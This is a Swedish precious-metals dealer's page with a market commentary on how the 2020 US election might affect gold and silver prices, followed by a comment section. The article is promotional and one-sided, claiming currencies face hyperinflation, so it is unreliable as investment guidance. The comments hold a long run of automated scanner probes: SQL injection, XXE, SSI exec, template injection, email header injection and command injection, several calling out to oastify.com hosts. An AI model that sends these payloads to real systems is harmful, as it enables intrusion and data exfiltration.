Hem
Köpa guld och silver
Sälja guld och silver
Diagram
Kunskapscentralen
Prispolicy
Hem Köpa silver guld platina palladium Sälja silver guld platina palladium Diagram Kunskapscentralen
Ändra
Visa varukorg
Till kassan
Antal   Produkt á Pris Pris

Summa: 0 kr

Marknadskommentar: Det amerikanska presidentvalets långsiktiga inverkan på guld- och silverpriserna

Av: Mikael From

Efter förra veckans amerikanska presidentval är det mycket som tyder på att det är demokraternas kandidat, Joe Biden, som blir USA:s nästa president.

Donald Trump meddelade redan under valvakan att han misstänker systematiskt valfusk till republikanernas nackdel i ett antal delstater. Trump har ännu ej accepterat Joe Biden som vinnare utan kommer i vissa stater kräva omräkningar av röster samt pröva valresultatet i domstol. Det råder i dagsläget delade meningar om huruvida Trump har möjlighet att vinna framgång i dessa processer.

Presidentvalet år 2000 mellan demokraternas Al Gore och republikanernas George W Bush var senaste valet med inblandning av högsta domstolen där det tog domstolen fem veckor att fastställa Bush som rättmätig vinnare. Med en uppsjö av påstådda oegentligheter talar mycket för att det även denna gång kommer ta tid att slutgiltigt fastställa resultatet.

Politikens påverkan på ekonomin

Med Biden som favorit till att utses som segrare är det intressant att undersöka vad Biden har gått till val på för ekonomisk politik och hur detta kan påverka den globala ekonomin i allmänhet och ädelmetaller i synnerhet.

Biden propagerar för högre skatter för företag och dess ägare. Det produktivitetsbortfall som följer förväntas sedan den amerikanska centralbanken, Federal Reserve, kompensera genom en ännu mer expansiv penningpolitik. Lägg därtill rådande pandemi där Biden, i större utsträckning än Trump, har varslat om fortsatta nedstängningar med konsekvenser för landets ekonomi. Nedstängningarna skall kompenseras med en mer expansiv finanspolitik med massiva stimulanser riktade till de som har drabbats av ekonomins nedgång. Statsskulden och dess ökningstakt, som redan nu är på redkordnivåer, kan således förväntas öka än mer. 

Joe Biden kommer vid det eventuella tillträdandet som 78-åring vara den äldsta amerikanska presidenten någonsin. Hans ålder är av vikt då han under valrörelsen vid ett flertal offentliga framträdanden framstått som tankspridd och fumlig. Detta väcker frågor om han är mentalt och fysiskt kapabel att klara av en hel mandatperiod som president. Om han i förtid kliver av presidentämbetet kommer han att efterträdas av vice-president, Kamala Harris. Harris politiska hemvist är långt ut på vänsterkanten med en starkt ekonomiskt inskränkande och inflationär politik. Amerikanarna är inte vana vid den typen av vänsterpolitik som Harris förespråkar och sådan politik skulle sannolikt ytterligare öka polariseringen i USA.  

Trump, å sin sida, har genomfört en stor del av den politik som han utlovade inför valet 2016 med skattsänkningar för företagare och löntagare i främsta rummet. Innan coronakrisen låg arbetslösheten på en historiskt låg nivå. Trump har däremot inte infriat löftet om att stoppa ökningen av statsskulden. Skattesänkningarna har inte matchats med motsvarande nedskärningar i statsapparaten. Istället har skattesänkningarna finansierats med ytterligare ökning av statsskulden, vilket är en kortsiktig och farlig politik som ytterligare ökar penninginflationen och skuldsättningen. 

Politikens påverkan på guld- och silverpriset

Oavsett om det blir Biden eller Trump som slutligen utses som segrare kommer guldpriset att gynnas.

Med Biden som segrare kommer de amerikanska bolagen beskattas hårdare. I gengäld har demokraterna lovat större finanspolitiska stimulanser och i snabbare takt än republikanerna. Det är rimligt att anta att världens börser, som till sin natur är kortsiktiga, prisar in att en stor del av dessa pengar i slutändan kommer att allokeras till aktiemarknaden.

Om Trump mot förmodan skulle utses som segrare kommer ekonomin sannolikt fortsätta på den redan inslagna vägen med budgetunderskott finansierade av Federal Reserves penningpress. För guldpriset spelar det mindre roll om stimulanserna är finanspolitiska genom att staten ger bidrag till medborgare och företag, eller penningpolitiska där centralbanken skapar mer pengar genom lägre räntor och kvantitativa lättnader. Båda innebär en inflationär politik där det i slutändan är vanliga sparare som får betala genom minskat penningvärde. Det bästa sättet att skydda sig mot sådan inflationär att spara i värdebeständiga tillgångar som guld och silver.  

Ett penningsystem i konkurs

Den politiska färgen på presidentvalets vinnare har till syvende och sist mindre betydelse. Vi har ett globalt ohållbart penningsystem där stimulanser antingen kommer att genomföras finansiellt eller monetärt. Om inte staten beskattar dig genom skattsystemet eroderar de istället värdet på dina pengar genom inflation.

Med coronakrisen som ursäkt har politiker och centralbanker släppt alla restriktioner vad gäller monetär inflation. Resultatet är en skuldsatt värld med ett peningsystem i gungning. Alla valutor av idag har redan förlorat 98-99% av sin köpkraft på 100 år och är nu på god väg mot hyperinflation. Guld är den enda typen av pengar som inte kan skapas ur tomma intet och som saknar motpartsrisk. Skydda dig mot politisk inkompetens och vårdslösa centralbanker - Köp Guld & Silver!

______________________________________________________

Visste du att vi även finns på Facebook och Twitter? Gilla och följ oss och ta del av nyheter som rör ekonomi i allmänhet och ädelmetaller i synnerhet. 

Med vänlig hälsning,
Liberty Silver AB

 

Kommentarer

Herr Offer 2023-09-23 17:40

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:30

<>

<> 2023-09-25 13:31

<>

<> 2023-09-25 13:31

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

<>

<> 2023-09-25 13:32

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % euuxd SYSTEM "http://dhy237yz4e5z0tdagqfj6rhe85e22u0i36vtnhc.oasti'||'fy.com/">%euuxd;]>'),'/l') from dual)

<> 2023-09-25 13:32

<>'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % euuxd SYSTEM "http://356srxmps4tpoj104g39uh54wv2sqko8swkjc71.oasti'||'fy.com/">%euuxd;]>'),'/l') from dual)||'

<> 2023-09-25 13:32

<>;declare @q varchar(99);set @q='\\2knr6w1o738o3igzjfi89gk3buhr5j37uxip5ht6.oasti'+'fy.com\iqg'; exec master.dbo.xp_dirtree @q;--

<> 2023-09-25 13:32

<>';declare @q varchar(99);set @q='\\93ayp3kvqarvmpz62m1fsn3au10yoqmed51xopce.oasti'+'fy.com\zgi'; exec master.dbo.xp_dirtree @q;--

<> 2023-09-25 13:32

<>);declare @q varchar(99);set @q='\\6elv00vs172sxma3djcc3ke75ybvznxbo3cvznnc.oasti'+'fy.com\cqc'; exec master.dbo.xp_dirtree @q;--

<> 2023-09-25 13:32

<>');declare @q varchar(99);set @q='\\zruodt8le0flafnwqcp5gdr0iroocga41xppch06.oasti'+'fy.com\rms'; exec master.dbo.xp_dirtree @q;--

<> 2023-09-25 13:32

(select load_file('\\\\evd3h8c0ifj0eurburtkksvfm6s3gvej5ltdg54u.oastify.com\\tgl'))

<> 2023-09-25 13:32

<>'+(select load_file('\\\\bn20954xacbx6rj8molhcpnce3k08s6gxjlb83ws.oastify.com\\mcq'))+'

<> 2023-09-25 13:32

<>'

<> 2023-09-25 13:32

<>'(select*from(select(sleep(20)))a)'

<> 2023-09-25 13:32

<>'+(select*from(select(sleep(20)))a)+'

<> 2023-09-25 13:32

<>' and (select*from(select(sleep(20)))a)--

<> 2023-09-25 13:32

<>,(select*from(select(sleep(20)))a)

<> 2023-09-25 13:32

<>' waitfor delay'0:0:20'--

<> 2023-09-25 13:32

<>')waitfor delay'0:0:20'--

<> 2023-09-25 13:32

<>',0)waitfor delay'0:0:20'--

<> 2023-09-25 13:32

<>'||pg_sleep(20)--

<> 2023-09-25 13:32

<>' AND pg_sleep(20)--

<> 2023-09-25 13:32

<>',''||pg_sleep(20)--

<> 2023-09-25 13:32

<>')AND pg_sleep(20)--

<> 2023-09-25 13:32

<>',0)AND pg_sleep(20)--

<> 2023-09-25 13:32

<>13356439' or '5005'='5005

<> 2023-09-25 13:32

<>44711636' or '4908'='4910

<> 2023-09-25 13:32

<>56233592' or 1402=1402--

<> 2023-09-25 13:32

<>86149088' or 4948=4953--

<> 2023-09-25 13:32

<>' and '7019'='7019

<> 2023-09-25 13:32

<>' and '2641'='2642

<> 2023-09-25 13:32

<>' and 1220=1220--

<> 2023-09-25 13:32

<>' and 2166=2175--

<> 2023-09-25 13:32

<>"

<> 2023-09-25 13:32

vi3mk9xo58

<> 2023-09-25 13:32

<>9q54rtpnll

<> 2023-09-25 13:32

<>}}aluax'/"<zht3h

<> 2023-09-25 13:32

<>%}paz4l'/"<fcgwt

<> 2023-09-25 13:32

<>lh5yf%>hbnc0'/"<faggx

<> 2023-09-25 13:32

<>'+sleep(20.to_i)+'

<> 2023-09-25 13:32

<>'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

<> 2023-09-25 13:32

eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

<> 2023-09-25 13:32

<>'.sleep(20).'

<> 2023-09-25 13:32

<>{${sleep(20)}}

<> 2023-09-25 13:32

88exu2puv9wuro457l6exm89z05xtprdj1bo3cs.oastify.com

<> 2023-09-25 13:32

http://cl11762y8d9y4sh9kpjiaqldc4i16t4hu5mseg3.oastify.com?<>

<> 2023-09-25 13:32

nslookup -q=cname 5flu1zwr263rylb2eidb4jf66xcu0myardf52xqm.oastify.com.&

<> 2023-09-25 13:32

<>|nslookup -q=cname xfgm1rwj2y3jydbuead34bfy6pcm0ey2uqmde13.oastify.com.&

<> 2023-09-25 13:32

<>'"`0&nslookup -q=cname pb4exjsbyqzbu57ma29v03bq2h8ew6uurij5bt0.oastify.com.&`'

<> 2023-09-25 13:32

<>&nslookup -q=cname xbcmxrsjyyzjud7uaa930bby2p8mweu2pqhd91y.oastify.com.&'\"`0&nslookup -q=cname xbcmxrsjyyzjud7uaa930bby2p8mweu2pqhd91y.oastify.com.&`'

<> 2023-09-25 13:32

<>|echo z4n22fsryc gqyuarmswx||a #' |echo z4n22fsryc gqyuarmswx||a #|" |echo z4n22fsryc gqyuarmswx||a #

<> 2023-09-25 13:32

<>&echo 9xdlq4gylq 6raui0stml&

<> 2023-09-25 13:32

<>"|echo r0mr77u1r3 zra71g6o2h ||

<> 2023-09-25 13:32

<>'|echo hvarbg59od mipcqgcgo4 #xzwx

<> 2023-09-25 13:32

<>|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

<> 2023-09-25 13:32

<>|ping -c 21 127.0.0.1||x

<> 2023-09-25 13:32

<>&ping -n 21 127.0.0.1&

<> 2023-09-25 13:32

<>'|ping -c 21 127.0.0.1 #

<> 2023-09-25 13:32

<>"|ping -n 21 127.0.0.1 ||

<> 2023-09-25 13:32

<>'+(function(){if(typeof c6p7y==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);c6p7y=1;}}())+'

<> 2023-09-25 13:32

"-->'-->`--><!--#set var="eab" value="d9a2v7qzwe"--><!--#set var="gcd" value="fbc4x9s1yg"--><!--#echo var="eab"--><!--#echo var="gcd"--><!--#exec cmd="nslookup -q=cname 0wxpiudmj1kmfgsxvdu6lew1nstphhf573vvin6c.oastify.com" -->

<> 2023-09-25 13:32

<>
BCC:y76ntsokuzvkqe3v6b54wc7zyq4nsfq3iw6otgh5@oastify.com
lvz: c

<> 2023-09-25 13:32

<>>
BCC:uzxjloggmvngiavry7x0o8zvqmwjkbizatylld92@oastify.com
byn: i

Herr Offer 2023-09-25 13:33

<>

Herr Offer 2023-09-25 13:33

<>

Herr Offer 2023-09-25 13:33

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:34

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:36

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:37

<>

Herr Offer 2023-09-25 13:39

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:40

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:41

<>

Herr Offer 2023-09-25 13:42

;declare @q varchar(99);set @q='\\c6j1s6nytduyps295p4ivq6dx431rtphg74cr9fy.oasti' 'fy.com\btg'; exec master.dbo.xp_dirtree @q;--

Herr Offer 2023-09-25 13:42

';declare @q varchar(99);set @q='\\vjik5p0h6w7h2bfsi8h189jwangk4c20trhw4tsi.oasti' 'fy.com\jdi'; exec master.dbo.xp_dirtree @q;--

Herr Offer 2023-09-25 13:42

);declare @q varchar(99);set @q='\\nricdh89eof9a3nkq0ptg1roifocc4as1kppcm0b.oasti' 'fy.com\xgd'; exec master.dbo.xp_dirtree @q;--

Herr Offer 2023-09-25 13:42

');declare @q varchar(99);set @q='\\k3o9pek6qlr6m0zh2x1qsy3luc09o1mpdi1nokc9.oasti' 'fy.com\lgu'; exec master.dbo.xp_dirtree @q;--

Herr Offer 2023-09-25 13:42

(select load_file('\\\\00ypmuhmn1omjgwxzdy6pe01rsxplhj5a7ycl99y.oastify.com\\wgf'))

Herr Offer 2023-09-25 13:42

' (select load_file('\\\\7y6wk1ftl8mthnu4xkwdnly8pzvwjohc8fwkjh76.oastify.com\\glr')) '

Herr Offer 2023-09-25 13:42

'

Herr Offer 2023-09-25 13:42

'(select*from(select(sleep(20)))a)'

Herr Offer 2023-09-25 13:42

' (select*from(select(sleep(20)))a) '

Herr Offer 2023-09-25 13:42

' and (select*from(select(sleep(20)))a)--

Herr Offer 2023-09-25 13:42

,(select*from(select(sleep(20)))a)

Herr Offer 2023-09-25 13:42

' waitfor delay'0:0:20'--

Herr Offer 2023-09-25 13:42

')waitfor delay'0:0:20'--

Herr Offer 2023-09-25 13:42

',0)waitfor delay'0:0:20'--

Herr Offer 2023-09-25 13:42

'||pg_sleep(20)--

Herr Offer 2023-09-25 13:42

' AND pg_sleep(20)--

Herr Offer 2023-09-25 13:42

',''||pg_sleep(20)--

Herr Offer 2023-09-25 13:42

')AND pg_sleep(20)--

Herr Offer 2023-09-25 13:42

',0)AND pg_sleep(20)--

Herr Offer 2023-09-25 13:42

30324932' or '5504'='5504

Herr Offer 2023-09-25 13:42

35032721' or '5610'='5618

Herr Offer 2023-09-25 13:42

71496519' or 9176=9176--

Herr Offer 2023-09-25 13:42

78125896' or 7183=7190--

Herr Offer 2023-09-25 13:42

' and '6129'='6129

Herr Offer 2023-09-25 13:42

' and '8186'='8187

Herr Offer 2023-09-25 13:42

' and 9108=9108--

Herr Offer 2023-09-25 13:42

' and 2177=2184--

Herr Offer 2023-09-25 13:42

"

Herr Offer 2023-09-25 13:42

4vrka81xlg

Herr Offer 2023-09-25 13:42

ou02qeturp

Herr Offer 2023-09-25 13:42

}}bm28k'/"<t32jl

Herr Offer 2023-09-25 13:42

' sleep(20.to_i) '

Herr Offer 2023-09-25 13:42

' eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single')) '

Herr Offer 2023-09-25 13:42

eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

Herr Offer 2023-09-25 13:42

'.sleep(20).'

Herr Offer 2023-09-25 13:42

{${sleep(20)}}

Herr Offer 2023-09-25 13:42

bbq0x5sxyczxur78ao9h0pbc2380wsugm4rrofd.oastify.com

Herr Offer 2023-09-25 13:42

http://hez60bv31i23xxaeducn3vei59b6zyxmnasxple.oastify.com?<>

Herr Offer 2023-09-25 13:42

nslookup -q=cname c8l1u6pyvdwyrs497p6ixq8dz451ttrhkk8pvmjb.oastify.com.

Herr Offer 2023-09-25 13:42

|nslookup -q=cname uqojco7gdveg9amrp7o0f8qvhmnjbb9z5naa7yw.oastify.com.

Herr Offer 2023-09-25 13:42

'"`0

Herr Offer 2023-09-25 13:42

|echo jwv4ohoc3y 50gijiy04c||a #' |echo jwv4ohoc3y 50gijiy04c||a #|" |echo jwv4ohoc3y 50gijiy04c||a #

Herr Offer 2023-09-25 13:42

"|echo 6e5g9aey5p ffc4fdlpuy ||

Herr Offer 2023-09-25 13:42

'|echo sf6ar9yr4i bk4v6a5kzi #xzwx

Herr Offer 2023-09-25 13:42

|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

Herr Offer 2023-09-25 13:42

|ping -c 21 127.0.0.1||x

Herr Offer 2023-09-25 13:42

'|ping -c 21 127.0.0.1 #

Herr Offer 2023-09-25 13:42

"|ping -n 21 127.0.0.1 ||

Herr Offer 2023-09-25 13:42

<slz xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://ixj7jce4kjl4gytfwvvomwxjoau7izgngblyim7.oastify.com/slz.xsd">slz</slz>

Herr Offer 2023-09-25 13:42

<pfr xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://59cuvzqrw6xrsl528i7byj960x6uumsatyylv9k.oastify.com/foo"/></pfr>

Herr Offer 2023-09-25 13:42

]]>><

Herr Offer 2023-09-25 13:42

' (function(){if(typeof mphzj==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);mphzj=1;}}()) '

